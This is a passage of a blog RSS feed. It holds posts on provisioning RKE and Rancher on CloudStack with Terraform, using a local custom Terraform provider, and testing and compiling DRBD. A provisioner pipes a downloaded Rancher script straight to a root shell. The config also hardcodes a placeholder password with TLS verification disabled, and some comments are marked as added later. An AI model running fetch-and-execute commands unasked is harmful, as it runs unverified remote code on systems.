}</code></pre><figcaption>Add SSH keys to CloudStack.</figcaption></figure><p>Adding the key after the machine is created should be possible, but something goes wrong every time I update it. I don&apos;t believe that feature is working correctly right now, so I decided to destroy and re-apply everything.</p><p>Now I&apos;m able to SSH into the machine using my <code>test_rsa</code> key. Let&apos;s set up the requirements for an RKE cluster.</p><h2 id="installing-the-required-packages">Installing the required packages</h2><p>I want to provision the server automatically with the needed docker packages. We could use <a href="https://www.ansible.com/">Ansible</a> for this or have a separate process to create perfect images with <a href="https://packer.io">Packer</a>, but let&apos;s stick to Terraform.</p><p>I&apos;ve added the following to my <code>main.tf</code></p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">  connection {
    type        = &quot;ssh&quot;
    user        = &quot;root&quot;
    private_key = file(&quot;test_rsa&quot;)
    host        = self.ip_address
  }
  
  provisioner &quot;remote-exec&quot; {
    inline  = [&quot;curl https://releases.rancher.com/install-docker/20.10.sh | sh&quot;]
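    # Hedged tip, not from the original post: instead of a full destroy/apply,
    # &quot;terraform apply -replace=cloudstack_instance.test&quot; (Terraform v0.15.2+)
    # recreates only this instance, so the provisioner runs again.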
  }</code></pre><figcaption>Adding remote-exec provisioner</figcaption></figure><p>Terraform will not execute this on the existing machine. But don&apos;t worry, we don&apos;t have to fall back to <em>manually logging in and running the commands</em>. Let&apos;s just <code>terraform destroy</code> and <code>terraform apply</code> again :)</p><p>You&apos;ll see that Terraform tries to connect over SSH before the machine has finished starting up, but once it has, the preparation script from Rancher starts running immediately and installs Docker.</p><h2 id="setting-up-rke">Setting up RKE</h2><p>Terraform can set up an RKE cluster on the machine you just created using the <a href="https://registry.terraform.io/providers/rancher/rke/latest/docs">RKE provider</a>. This setup will be a single-node RKE cluster. I&apos;ve made another file named <code>rke.tf</code> which contains the following:</p><figure class="kg-card kg-code-card"><pre><code>provider &quot;rke&quot; {
  debug = true
  log_file = &quot;rke_debug.log&quot;
}

resource &quot;rke_cluster&quot; &quot;cluster_local&quot; {
  nodes {
    address = cloudstack_instance.test.ip_address
    user    = &quot;root&quot;
    role    = [&quot;controlplane&quot;, &quot;worker&quot;, &quot;etcd&quot;]
    ssh_key = file(&quot;test_rsa&quot;)
  }
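  # Sketch, not part of the original single-node setup: a multi-node cluster
  # would repeat the nodes block per machine, e.g. with role = [&quot;worker&quot;]
  # only for additional workers.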
}</code></pre><figcaption>Adding RKE provider config</figcaption></figure><p>I&apos;ve also added the following to the <code>main.tf</code> :</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">terraform {
  required_providers {
    cloudstack = {
      source = &quot;cloudstack/cloudstack&quot;
      version = &quot;0.4.0&quot;
    }
    # This part
    rke = {
      source = &quot;rancher/rke&quot;
      version = &quot;1.3.0&quot;
    }
  }
}</code></pre><figcaption>Adding RKE provider download</figcaption></figure><p>After this change, you&apos;ll need to rerun <code>terraform init</code> to fetch the required provider.</p><p>When you run <code>terraform apply</code> now, you&apos;ll notice it says it wants to install an RKE cluster using Rancher&apos;s hyperkube version <code>v1.21.7-rancher1-1</code>. To use a newer version, you&apos;ll have to update a dependency in the RKE provider, but I&apos;ll explain how to do that in a separate blog post.</p><p>You&apos;ll also notice an error:</p><blockquote>Failed running cluster err:[network] Can&apos;t access KubeAPI port [6443] on Control Plane host: 4.5.6.7</blockquote><p>The RKE provider can&apos;t connect to the machine&apos;s port 6443. Let&apos;s fix that by changing the <code>Home-Ruleset</code> in <code>security_groups.tf</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;cloudstack_security_group_rule&quot; &quot;Default-SG-Home-Ruleset&quot; {
  security_group_id = cloudstack_security_group.Default-SG.id

  rule {
    cidr_list = [&quot;1.2.3.4/32&quot;]
    protocol  = &quot;tcp&quot;
    ports     = [&quot;22&quot;, &quot;6443&quot;]
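    # Later, when installing Rancher, this same list also needs web traffic:
    #   ports = [&quot;22&quot;, &quot;6443&quot;, &quot;80&quot;, &quot;443&quot;]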
  }
}</code></pre><figcaption>Adding 6443 to rules</figcaption></figure><p>Now RKE should install just fine. If not, destroy and re-apply. If you keep running into random issues, check the available disk space and <code>rke_debug.log</code>.</p><h2 id="getting-the-kubeconfigyaml">Getting the kubeconfig.yaml</h2><p>Of course, we want to access the RKE cluster from our terminal. We can extract the kubeconfig YAML with <code>terraform show -json</code>, but doing that by hand every time is cumbersome.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">marco@DESKTOP-WS:~/tests$ terraform show -json | jq &apos;.values[&quot;root_module&quot;][&quot;resources&quot;][] | select(.address == &quot;rke_cluster.cluster_local&quot;) | .values.kube_config_yaml&apos; -r
apiVersion: v1
kind: Config
clusters:
- cluster:
    api-version: v1
    certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0F....</code></pre><figcaption>Extracting using JSON</figcaption></figure><p>We can automate it away using the <code>local_sensitive_file</code> resource of Terraform provider <a href="https://registry.terraform.io/providers/hashicorp/local/latest/docs/resources/file">hashicorp/local</a>. Add the following to <code>rke.tf</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;local_sensitive_file&quot; &quot;kube_config_yaml&quot; {
  content = rke_cluster.cluster_local.kube_config_yaml
  filename = &quot;kubeconfig.yaml&quot;
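  # Optional, assuming your hashicorp/local version supports the attribute:
  #   file_permission = &quot;0600&quot;   # keep the kubeconfig private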
}</code></pre><figcaption>local_sensitive_file</figcaption></figure><p>And update the <code>main.tf</code> with the new provider used:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">terraform {
  required_providers {
...
    local = {
      source = &quot;hashicorp/local&quot;
      version = &quot;2.2.2&quot;
    }
  }
}</code></pre><figcaption>main.tf Adding the local provider</figcaption></figure><p><em>Don&apos;t forget to run terraform init!</em></p><p>Running <code>terraform apply</code> writes the <code>kubeconfig.yaml</code> to the local filesystem. You can now talk to the RKE cluster.</p><pre><code class="language-shell-session">marco@DESKTOP-WS:~/tests$ export KUBECONFIG=kubeconfig.yaml
marco@DESKTOP-WS:~/tests$ kubectl get nodes
NAME            STATUS   ROLES                      AGE   VERSION
5.6.7.8   Ready    controlplane,etcd,worker   23m   v1.21.7</code></pre><h2 id="installing-rancher">Installing Rancher</h2><p>Finally, after all that writing and five iterations of the RKE machine, we&apos;re ready to install Rancher. To do this, we&apos;ll be using the <a href="https://registry.terraform.io/providers/hashicorp/helm/latest">hashicorp/helm</a> and <a href="https://registry.terraform.io/providers/rancher/rancher2/latest/docs">rancher/rancher2</a> providers.</p><p>Add the providers to <code>main.tf</code>. Also, define the location of the <code>kubeconfig.yaml</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">terraform {
  required_providers {
...
    rancher2 = {
      source = &quot;rancher/rancher2&quot;
      version = &quot;1.22.2&quot;
    }
    helm = {
      source = &quot;hashicorp/helm&quot;
      version = &quot;2.4.1&quot;
    }
  }
}

provider &quot;helm&quot; {
  kubernetes {
    config_path = &quot;kubeconfig.yaml&quot;
  }
}</code></pre><figcaption>Adding helm config to main.tf</figcaption></figure><p>Add ports 80 and 443 to <code>security_groups.tf</code>, else you won&apos;t be able to access the cluster and Terraform can&apos;t bootstrap it.</p><p>cert-manager is a dependency of Rancher, so create a new file called <code>certmanager.tf</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;helm_release&quot; &quot;cert_manager&quot; {
  name             = &quot;cert-manager&quot;
  namespace        = &quot;cert-manager&quot;
  repository       = &quot;https://charts.jetstack.io&quot;
  chart            = &quot;cert-manager&quot;
  version          = &quot;1.5.3&quot;

  wait             = true
  create_namespace = true
  force_update     = true
  replace          = true

  set {
    name  = &quot;installCRDs&quot;
    value = true
  }
}
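# The set block above is the flag equivalent of a values.yaml containing:
#   installCRDs: true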
</code></pre><figcaption>Adding helm install to certmanager.tf</figcaption></figure><p>You can use <code>set</code> to override values like you would in a <code>values.yaml</code>.</p><p>Next, create a file called <code>rancher.tf</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;helm_release&quot; &quot;rancher&quot; {
  name = &quot;rancher&quot;
  namespace = &quot;cattle-system&quot;
  chart = &quot;rancher&quot;
  repository = &quot;https://releases.rancher.com/server-charts/latest&quot;
  depends_on = [helm_release.cert_manager]

  wait             = true
  create_namespace = true
  force_update     = true
  replace          = true

  set {
    name  = &quot;hostname&quot;
    value = &quot;rancher.debugdomain.com&quot;
  }

  set {
    name  = &quot;ingress.tls.source&quot;
    value = &quot;rancher&quot;
  }
  
  set {
    name  = &quot;bootstrapPassword&quot;
    value = &quot;A-Random-Password&quot;
  }

  set {
    name  = &quot;rancherImageTag&quot;
    value = &quot;v2.6.3-patch1&quot;
  }
}

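# Note: bootstrapPassword above must match initial_password in the
# rancher2_bootstrap resource below.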
provider &quot;rancher2&quot; {
  alias = &quot;bootstrap&quot;

  api_url   = &quot;https://rancher.debugdomain.com&quot;
  insecure  = true
  bootstrap = true
}

# Create a new rancher2_bootstrap using bootstrap provider config
resource &quot;rancher2_bootstrap&quot; &quot;admin&quot; {
  provider = rancher2.bootstrap
  depends_on = [helm_release.rancher]
  initial_password = &quot;A-Random-Password&quot;
  # New password will be generated and saved in statefile
  telemetry = false
}

# Provider config for admin
provider &quot;rancher2&quot; {
  alias = &quot;admin&quot;

  api_url = rancher2_bootstrap.admin.url
  token_key = rancher2_bootstrap.admin.token
  insecure = true
}
</code></pre><figcaption>All Rancher.tf config</figcaption></figure><p>The <code>rancher.tf</code> is one of the bigger Terraform files. Using the <a href="https://registry.terraform.io/providers/rancher/rancher2/latest/docs">Rancher provider</a>, it defines:</p><ul><li>The Helm installation of Rancher</li><li>Where the Rancher cluster will be</li><li>A bootstrap provider for Rancher</li><li>An admin provider for Rancher</li></ul><p>If your security groups are wide open, choose a unique, strong password for the initial Rancher Helm deployment.</p><p>We override the Rancher image tag to get the latest patches, as this is not the default.</p><p>Using the <code>alias</code> attribute, we can define multiple instances of the same provider. This way, we separate the admin configuration from the bootstrap configuration.</p><p>Once we run <code>terraform apply</code>, we&apos;ll see the Rancher server being created.</p><p>We can access the generated password by running:</p><figure class="kg-card kg-code-card"><pre><code class="language-bash">terraform show -json \
  | jq &apos;.values[&quot;root_module&quot;][&quot;resources&quot;][]
  | select(.address == &quot;rancher2_bootstrap.admin&quot;) | .values.password&apos; -r</code></pre><figcaption>Using JSON to extract password</figcaption></figure><p>But we can also ask Terraform to write it down:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;local_sensitive_file&quot; &quot;rancher-password&quot; {
  content = rancher2_bootstrap.admin.password
  filename = &quot;rancher_password&quot;
}</code></pre><figcaption>Write password to sensitive file</figcaption></figure><h2 id="unforeseen-dependency-problems">Unforeseen dependency problems</h2><p>To test this script, we can now run <code>terraform destroy</code> and <code>terraform apply</code>. It will immediately tell you that <code>kubeconfig.yaml</code> does not exist. The file is missing because Terraform hasn&apos;t created the cluster yet. Growing your Terraform module step by step can introduce unwanted dependency ordering: the Helm provider needs the kubeconfig file when it is initialized, but that file only exists after the RKE cluster has been created. There is a lot more on this subject in this <a href="https://github.com/hashicorp/terraform/issues/2430">GitHub issue</a>.</p><p>To fix this problem, I&apos;ve moved a lot of things around. I made three directories:</p><ul><li>Cloud</li><li>RKE</li><li>Rancher</li></ul><p>I&apos;ve moved everything CloudStack-related to Cloud and so forth.</p><figure class="kg-card kg-code-card"><pre><code class="language-text">.
&#x251C;&#x2500;&#x2500; cloud
&#x2502;   &#x251C;&#x2500;&#x2500; instances.tf
&#x2502;   &#x251C;&#x2500;&#x2500; main.tf
&#x2502;   &#x2514;&#x2500;&#x2500; security_groups.tf
&#x251C;&#x2500;&#x2500; rancher
&#x2502;   &#x251C;&#x2500;&#x2500; certmanager.tf
&#x2502;   &#x251C;&#x2500;&#x2500; main.tf
&#x2502;   &#x2514;&#x2500;&#x2500; rancher.tf
&#x251C;&#x2500;&#x2500; rke
&#x2502;   &#x251C;&#x2500;&#x2500; main.tf
&#x2502;   &#x251C;&#x2500;&#x2500; rke.tf
&#x2502;   &#x2514;&#x2500;&#x2500; rke_debug.log
&#x251C;&#x2500;&#x2500; test_rsa
&#x2514;&#x2500;&#x2500; test_rsa.pub</code></pre><figcaption>Directory tree</figcaption></figure><h2 id="breaking-apart-the-monolith">Breaking apart the monolith</h2><p>Having everything in one Terraform configuration causes dependency troubles. Besides that, you can&apos;t split privileges per layer of your infrastructure that way: some people could manage CloudStack, others RKE and Rancher. Breaking the config into small pieces that only do what they&apos;re supposed to creates more flexibility. It looks a lot cleaner, too.</p><h3 id="cloud">Cloud</h3><p>I&apos;ve changed the <code>main.tf</code> and moved the RKE and Rancher provider configuration to the <code>main.tf</code> of those respective directories. Another change is having Cloud write an output after each run to export the IP address to the others.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">output &quot;ip_address&quot; {
  value = cloudstack_instance.test.ip_address
}</code></pre><figcaption>Output info of Terraform run and save in terraform.state</figcaption></figure><p>I&apos;ve also changed all pointers to <code>test_rsa</code> to point to <code>../test_rsa</code>.</p><h3 id="rke">RKE</h3><p>RKE now has to read Cloud&apos;s output. To do this, add this small config to the <code>main.tf</code> of RKE to make it aware of Cloud&apos;s state:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">data &quot;terraform_remote_state&quot; &quot;cloud&quot; {
  backend = &quot;local&quot; 
  config = {
    path    = &quot;../cloud/terraform.tfstate&quot;
  }
}</code></pre><figcaption>Read output data from remote terraform.state</figcaption></figure><p>Change the <code>cloudstack_instance.test.ip_address</code> to <code>data.terraform_remote_state.cloud.outputs.ip_address</code> in <code>rke.tf</code>.</p><p>Change the <code>test_rsa</code> path to <code>../test_rsa</code>. You should do the same with the pub file.</p><h3 id="rancher">Rancher</h3><p>The only change needed here is to point to the correct location of <code>kubeconfig.yaml</code>, which is <code>../rke/kubeconfig.yaml</code>.</p><h2 id="testing-it-again">Testing it again</h2><p>To test the complete module, we should enter the cloud directory first. Apply and move on to the next directory, RKE. Once RKE is set up, move to the Rancher directory and apply again.</p><h2 id="conclusion">Conclusion</h2><p>With the installation of Rancher, we&apos;ve come to the end of this blog post. The following blog post will be about provisioning multiple servers efficiently and growing the Rancher instance. We&apos;ll also add an extra cluster to the Rancher instance.</p>]]></content:encoded></item><item><title><![CDATA[Using custom providers in Terraform]]></title><description><![CDATA[<p>The <a href="https://github.com/rancher/terraform-provider-rke">RKE provider</a> that I&apos;d like to use is some versions behind. It seemed easy enough to update the dependency, but I struggled to get this custom RKE provider working without having to upload it somewhere. The documentation didn&apos;t seem to be obvious enough. 
After searching</p>]]></description><link>https://fe.ax/custom-terraform-providers/</link><guid isPermaLink="false">62aa367b094121017a6b401a</guid><category><![CDATA[shorts]]></category><category><![CDATA[Terraform]]></category><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Fri, 18 Mar 2022 07:10:39 GMT</pubDate><content:encoded><![CDATA[<p>The <a href="https://github.com/rancher/terraform-provider-rke">RKE provider</a> that I&apos;d like to use is some versions behind. It seemed easy enough to update the dependency, but I struggled to get this custom RKE provider working without having to upload it somewhere. The documentation didn&apos;t seem to be obvious enough. After searching on Google, I found <a href="https://github.com/hashicorp/terraform-website/issues/1513">this issue on GitHub</a>, which made it clear.</p><p>For me, the example meant:</p><figure class="kg-card kg-code-card"><pre><code class="language-terraform"># main.tf

terraform {
  required_providers {
    rke = {
      source = &quot;my.local/marco/rke&quot;
      version = &quot;1.3.1&quot;
    }
  }
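  # Hedged sketch (binary name assumed): after building the provider, place
  # it in the local plugin mirror shown below, e.g.:
  #   mkdir -p ~/.terraform.d/plugins/my.local/marco/rke/1.3.1/linux_amd64
  #   cp terraform-provider-rke ~/.terraform.d/plugins/my.local/marco/rke/1.3.1/linux_amd64/terraform-provider-rke_v1.3.1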
}</code></pre><figcaption>Terraform providers</figcaption></figure><figure class="kg-card kg-code-card"><pre><code class="language-shell">~/.terraform.d/plugins/my.local/marco/rke/1.3.1/linux_amd64/terraform-provider-rke_v1.3.1</code></pre><figcaption>Directory structure from home</figcaption></figure>]]></content:encoded></item><item><title><![CDATA[Reliability DRBD]]></title><description><![CDATA[How reliable is DRBD in diskless mode? Let's find out by trying.]]></description><link>https://fe.ax/reliability-drbd/</link><guid isPermaLink="false">62aa367b094121017a6b4018</guid><category><![CDATA[DRBD]]></category><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Mon, 28 Feb 2022 15:05:51 GMT</pubDate><content:encoded><![CDATA[<p>In my last post, I showed that DRBD could be used diskless, which effectively does the same as exposing a disk with iSCSI. However, DRBD can do more than just become an iSCSI target, and its most known feature is replicating disks over a network.</p><p>This post will look into mounting a DRBD device diskless and testing its reliability when one of the two backing nodes fails and more.</p><!--kg-card-begin: markdown--><p>I started by mounting the DRBD disk on node 3, the diskless node. If you run <code>drbdadm status</code> it should show the following:</p>
<!--kg-card-end: markdown--><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@drbd1:~# drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd2 role:Secondary
    peer-disk:UpToDate
  drbd3 role:Primary
    peer-disk:Diskless</code></pre><figcaption>drbdadm status</figcaption></figure><!--kg-card-begin: markdown--><p>After it&apos;s mounted, I&apos;ve created a small test file and installed <code>pv</code>. I started writing the test file slowly to the disk. For now, we don&apos;t want to overload the disk or fill it up too quickly to perform reliability tests.</p>
<!--kg-card-end: markdown--><p>I gave node one a shutdown command to test the reliability under normal circumstances. After it came back, I gave node two a shutdown command.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session"># Diskless DRBD node 3

root@drbd3:~# dd if=/dev/urandom bs=1M count=1 &gt; /testfile
root@drbd3:~# cat /testfile | pv -L 40000 -r -p -e -s 1M &gt; /mnt/testfile
[39.3KiB/s] [=====&gt;                          ] 11% ETA 0:00:23

# DRBD node 1

root@drbd1:~# reboot
Connection to 192.168.178.199 closed by remote host.
Connection to 192.168.178.199 closed.

# DRBD node 2

root@drbd2:~# drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd1 connection:Connecting
  drbd3 role:Primary
    peer-disk:Diskless

# DRBD node 1

root@drbd1:~# drbdadm adjust all
Marked additional 4096 KB as out-of-sync based on AL.
root@drbd1:~# drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd2 role:Secondary
    peer-disk:UpToDate
  drbd3 role:Primary
    peer-disk:Diskless

# Diskless DRBD node 3

root@drbd3:~# md5sum /testfile &amp;&amp; md5sum /mnt/testfile
553118a49cea22b739c2cf43fa53ae86  /testfile
553118a49cea22b739c2cf43fa53ae86  /mnt/testfile</code></pre><figcaption>Testing reliability with graceful reboots</figcaption></figure><p>During the reboot of DRBD node one, the writes on DRBD node three stalled briefly but resumed very soon after.</p><p>When applying more pressure on the disks using a 3GB test file and unlimited speed, the disk of the rebooted server became inconsistent and needed a resync.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@drbd2:~# reboot
Connection to 192.168.178.103 closed by remote host.
Connection to 192.168.178.103 closed.
root@DESKTOP-2RFLM66:~# ssh 192.168.178.103
root@drbd2:~# drbdadm status
# No currently configured DRBD found.
root@drbd2:~# drbdadm adjust all
root@drbd2:~# drbdadm status
test-disk role:Secondary
  disk:Inconsistent
  drbd1 role:Secondary
    replication:SyncTarget peer-disk:UpToDate done:7.28
  drbd3 role:Primary
    peer-disk:Diskless resync-suspended:dependency
    
# Diskless DRBD node 3

root@drbd3:~# md5sum /testfile &amp;&amp; md5sum /mnt/testfile
d67f12594b8f29c77fc37a1d81f6f981  /testfile
d67f12594b8f29c77fc37a1d81f6f981  /mnt/testfile
root@drbd3:~# md5sum /testfile &amp;&amp; md5sum /mnt/testfile
d67f12594b8f29c77fc37a1d81f6f981  /testfile
d67f12594b8f29c77fc37a1d81f6f981  /mnt/testfile
root@drbd3:~# md5sum /testfile &amp;&amp; md5sum /mnt/testfile
d67f12594b8f29c77fc37a1d81f6f981  /testfile
d67f12594b8f29c77fc37a1d81f6f981  /mnt/testfile</code></pre><figcaption>Same test but with 3GB file at 500MBps write speed.</figcaption></figure><p>So DRBD seems to be very stable when the servers are rebooted gracefully. But what happens if we reboot them both?</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@drbd3:~# cat /testfile | pv -r -p -e -s 3000M &gt; /mnt/testfile; md5sum /testfile &amp;&amp; md5sum /mnt/testfile
[3.67MiB/s] [=======================================&gt;                                                                         ] 36% ETA 0:00:22
pv: write failed: Read-only file system

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.824570] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.825393] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.826171] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.826876] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.827601] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.828365] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.829102] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)
d67f12594b8f29c77fc37a1d81f6f981  /testfile
md5sum: /mnt/testfile: Input/output error
root@drbd3:~# md5sum /testfile &amp;&amp; md5sum /mnt/testfile
d67f12594b8f29c77fc37a1d81f6f981  /testfile
2f80ddfb7fe21b9294b2e3663c0a0644  /mnt/testfile
root@drbd3:~# mount | grep mnt
/dev/drbd1 on /mnt type ext4 (ro,relatime)</code></pre><figcaption>Testing both persistent disk reboots at the same time</figcaption></figure><p>It doesn&apos;t like that. But the data seems to be intact up to the point where writes stopped. Of course, you don&apos;t want this to happen, but at least the disks are still mountable and readable.</p><h2 id="what-if-the-network-starts-flapping">What if the network starts flapping?</h2><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@drbd1:~# drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd2 role:Secondary
    peer-disk:UpToDate
  drbd3 role:Primary
    peer-disk:Diskless

... Connectivity failure due to tagging VM with wrong VLAN in Hyper-V

... Restoring VLAN settings

root@drbd1:~# drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd2 connection:Connecting
  drbd3 connection:Connecting

root@drbd1:~# drbdadm status
test-disk role:Secondary
  disk:Inconsistent
  drbd2 role:Secondary
    replication:SyncTarget peer-disk:UpToDate done:5.39
  drbd3 role:Primary
    peer-disk:Diskless resync-suspended:dependency</code></pre><figcaption>Interrupting network connectivity</figcaption></figure><p>Writing to the disk was just as fast as writing when both were available.</p><h2 id="what-if-we-have-a-broken-network-connection-that-allows-10mbps">What if we have a broken network connection that allows 10Mbps?</h2><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/image-1.png" class="kg-image" alt loading="lazy" width="690" height="131" srcset="https://fe.ax/content/images/size/w600/2022/02/image-1.png 600w, https://fe.ax/content/images/2022/02/image-1.png 690w"><figcaption>Normal speed</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/image-2.png" class="kg-image" alt loading="lazy" width="442" height="179"><figcaption>Hyper-V setting</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/image-3.png" class="kg-image" alt loading="lazy" width="690" height="104" srcset="https://fe.ax/content/images/size/w600/2022/02/image-3.png 600w, https://fe.ax/content/images/2022/02/image-3.png 690w"><figcaption>New speed</figcaption></figure><p>However, this only seems to work on outgoing traffic, not incoming traffic. While reading from the disk, both nodes are limited at 10Mbps if one of them is.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/image-4.png" class="kg-image" alt loading="lazy" width="690" height="208" srcset="https://fe.ax/content/images/size/w600/2022/02/image-4.png 600w, https://fe.ax/content/images/2022/02/image-4.png 690w"><figcaption>Above DRBD node 1, limited at 10Mbps. 
Below DRBD node 2, unlimited</figcaption></figure><p>When setting the DRBD &quot;test-disk&quot; down on node 1, the speed of node 2 became unlimited again.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/image-6.png" class="kg-image" alt loading="lazy" width="691" height="81" srcset="https://fe.ax/content/images/size/w600/2022/02/image-6.png 600w, https://fe.ax/content/images/2022/02/image-6.png 691w"><figcaption>After &quot;drbdadm down test-disk.&quot;</figcaption></figure><p>It&apos;s interesting to see that it balances the reads across both nodes.</p><h2 id="what-if-a-node-gets-panicked-during-writes">What if a node panics during writes?</h2><p>Let&apos;s reset DRBD node two while writing at full speed.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">root@drbd2:~# packet_write_wait: Connection to 192.168.178.103 port 22: Broken pipe
root@DESKTOP-2RFLM66:~# ssh 192.168.178.103
Last login: Mon Feb 28 14:32:18 2022 from 192.168.178.47
root@drbd2:~# drbdadm status
# No currently configured DRBD found.
root@drbd2:~# drbdadm adjust all
Marked additional 4948 MB as out-of-sync based on AL.
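# Once the node is back and re-adjusted, the resync progress shows up as the
# done: percentage in drbdadm status. A small helper to pull that number out
# for monitoring -- a sketch, based only on the status format shown in this post:
```shell
# Extract the done:NN.NN resync percentage from drbdadm status output.
sync_done() { awk 'match($0, /done:[0-9.]+/) { print substr($0, RSTART+5, RLENGTH-5) }'; }

# Example against a sample status line (on a real node: drbdadm status | sync_done):
printf 'replication:SyncTarget peer-disk:UpToDate done:0.21\n' | sync_done
# prints: 0.21
```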
root@drbd2:~# drbdadm status
test-disk role:Secondary
  disk:Inconsistent
  drbd1 role:Secondary
    replication:SyncTarget peer-disk:UpToDate done:0.21
  drbd3 role:Primary
    peer-disk:Diskless resync-suspended:dependency</code></pre><figcaption>Reset node two</figcaption></figure><p>Besides a short hiccup, we don&apos;t notice anything after DRBD declares node two unavailable.</p><h2 id="conclusion">Conclusion</h2><p>DRBD has proven to be very stable. Rebooting or resetting DRBD nodes results in a short hiccup, but the cluster continues to work just fine. I couldn&apos;t yet figure out why limiting one node&apos;s network bandwidth results in both nodes being limited in read speed, and I&apos;d like to see that being balanced based on the congestion of the network. In the next DRBD post, I hope to look at LINSTOR.</p>]]></content:encoded></item><item><title><![CDATA[Diskless DRBD]]></title><description><![CDATA[Exploring DRBD's diskless mode for the fastest, most flexible way to run RAID1 over the network.]]></description><link>https://fe.ax/diskless-drbd/</link><guid isPermaLink="false">62aa367b094121017a6b4017</guid><category><![CDATA[DRBD]]></category><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Wed, 23 Feb 2022 22:40:58 GMT</pubDate><content:encoded><![CDATA[<p>I&apos;ve been using DRBD for quite some time now. When I started as a Linux system administrator at my first real job, DRBD was this RAID1 high-availability storage thing that was magic to me. In combination with PiranHA, which retired ten years ago, I built a setup I demonstrated to my colleague as a high availability setup.</p><p>Although this was ten years ago, the people at LINBIT haven&apos;t been sitting still. DRBD 9 came to life in 2015, but I had never had any experience with its new features other than &quot;Just using it&quot;. When I started looking into Kubernetes, I also started looking deeper into DRBD.</p><p>If you&apos;ve used DRBD 9, you probably know it can, contrary to DRBD 8, replicate to more than two nodes. Replication to three nodes means you can use DRBD in a cluster of three nodes without having to decide which two nodes can run which workload. 
The downside of this is the increased disk usage, and an even more significant problem is scalability and flexibility once you reach ten or even 100 nodes. You&apos;re not going to replicate all the data across all 100 nodes.</p><p>Flexibility is where diskless DRBD comes in. Once you&apos;ve installed DRBD on every node of your cluster, your disks aren&apos;t bound to the metal casing they reside in. You can expose a single disk on one node to another without replicating the data. Let&apos;s dive into the technical stuff now!</p><p>Installing virtual machines manually is boring. Use Hyper-V on your Windows workstation to quickly get some virtual machines up and running. Soon I&apos;ll talk about doing the same thing with Terraform on AWS, Azure and GCP!</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://fe.ax/content/images/2022/02/2022-02-23_21-33-47.gif" class="kg-image" alt loading="lazy" width="1026" height="872" srcset="https://fe.ax/content/images/size/w600/2022/02/2022-02-23_21-33-47.gif 600w, https://fe.ax/content/images/size/w1000/2022/02/2022-02-23_21-33-47.gif 1000w, https://fe.ax/content/images/2022/02/2022-02-23_21-33-47.gif 1026w"><figcaption>Manual labour! :(</figcaption></figure><p>So I&apos;ve set up three virtual machines with Ubuntu 20.04. First things first: I placed my keys on the servers and updated them to the latest packages. Make a snapshot; it saves you time.</p><p>Something I wanted to do differently in this blog is compiling DRBD myself. Usually, I would use the LINBIT PPA repo, and of course, you can do so. However, time will pass, this post will get old, versions will change, and its accuracy will rot.</p><p>Let&apos;s prepare the servers for DRBD! The commands used to compile are so simple.</p><figure class="kg-card kg-code-card"><pre><code class="language-bash"># DRBD Kernel Module

sudo apt install build-essential flex
wget https://pkg.linbit.com/downloads/drbd/9/drbd-9.2.0-rc.4.tar.gz
tar zxvf drbd-9.2.0-rc.4.tar.gz
cd drbd-9.2.0-rc.4/
make -j 8
sudo make install
cd - # return to previous directory

# DRBD Utils

wget https://pkg.linbit.com/downloads/drbd/utils/drbd-utils-9.20.2.tar.gz
tar zxvf drbd-utils-9.20.2.tar.gz
cd drbd-utils-9.20.2
./configure --with-manual=no --with-pacemaker=no --with-xen=no --without-83support --without-84support --with-heartbeat=no --prefix=/opt/drbd
